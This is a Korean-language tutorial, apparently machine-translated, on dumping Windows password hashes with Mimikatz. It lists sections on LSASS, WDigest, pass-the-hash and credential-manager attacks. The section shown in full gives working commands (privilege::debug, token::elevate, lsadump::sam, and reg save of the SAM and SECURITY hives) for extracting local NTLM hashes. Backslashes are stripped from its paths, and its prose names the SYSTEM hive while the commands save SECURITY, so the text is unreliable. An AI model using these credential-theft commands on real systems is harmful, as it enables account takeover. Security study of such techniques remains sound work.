Mimikatz를 활용한 윈도우 계정 탈취 - LSASS 이용
Windows 보안에 관한 시리즈의 일부로 작성된 이 기사에서는 다음을 사용하여 모든 활성 Windows 사용자의 암호를 얻는 아주 간단한 방법을 배웁니다. Mimikatz.
Mimikatz.exe Windows 메모리, 암호 해시, Kerberos 티켓 등에서 일반 텍스트 암호를 추출할 수 있습니다. 또한 mimikatz를 사용하면 pass-the-hash, pass-the-ticket 공격을 수행하거나 Golden Kerberos 티켓을 생성할 수 있습니다. mimikatz 기능은 Metasploit Framework에서도 사용할 수 있습니다.
당신은 다운로드 할 수 있습니다 mimikatz GitHub 리포지토리에서: https://github.com/gentilkiwi/mimikatz/releases/. mimikatz_trunk.zip 아카이브를 C:Toolsmimikatz에 추출합니다. x64 및 x86용으로 두 가지 버전의 mimikatz가 이 디렉토리에 나타납니다. Windows 비트에 해당하는 버전을 사용하십시오.
이 기사에서는 mimikatz를 사용하여 Windows Server 2016 또는 Windows 10에서 사용자 암호를 얻는 방법을 보여줍니다.
Disclaimer. 이 기사에 설명된 정보 및 기술은 정보 제공의 목적으로만 사용해야 하며 제3자의 계정, 데이터 및 시스템에 대한 액세스 권한을 얻지 않아야 합니다.
Contents
- Mimikatz를 사용하여 LSASS에서 Windows 해시 암호 해킹
- Hyberfil.sys 및 VM 페이지 파일에서 Windows 암호 추출
- WDigest를 사용하여 일반 텍스트로 Windows 암호 추출
- SAM에서 로컬 사용자 암호 해시 추출
- Mimikatz를 통한 Pass-the-Hash 공격 수행
- Windows 자격 증명 관리자에서 암호 덤핑
- 일반 텍스트로 Windows 로그온 암호 덤프
- 자격 증명 덤핑 공격으로부터 Windows 보호
SAM에서 로컬 사용자 암호 해시 추출
mimikatz를 사용하면 SAM에서 로컬 Windows 사용자(내장 관리자 계정 포함)의 암호 해시를 추출할 수 있습니다.
privilege::debug
token::elevate
lsadump::sam
레지스트리 SAM 하이브에서 NTLM 해시를 추출할 수도 있습니다.
- SYSTEM 및 SAM 레지스트리 하이브를 파일로 내보냅니다.
reg save hklmsam c:tmpsam.hiv
reg save hklmsecurity c:tmpsec.hiv
- 그런 다음 Mimikatz를 사용하여 암호 해시를 덤프합니다.
privilege::debug
token::elevate
lsadump::sam c:tmpsam.hiv c:tmpsec.hiv
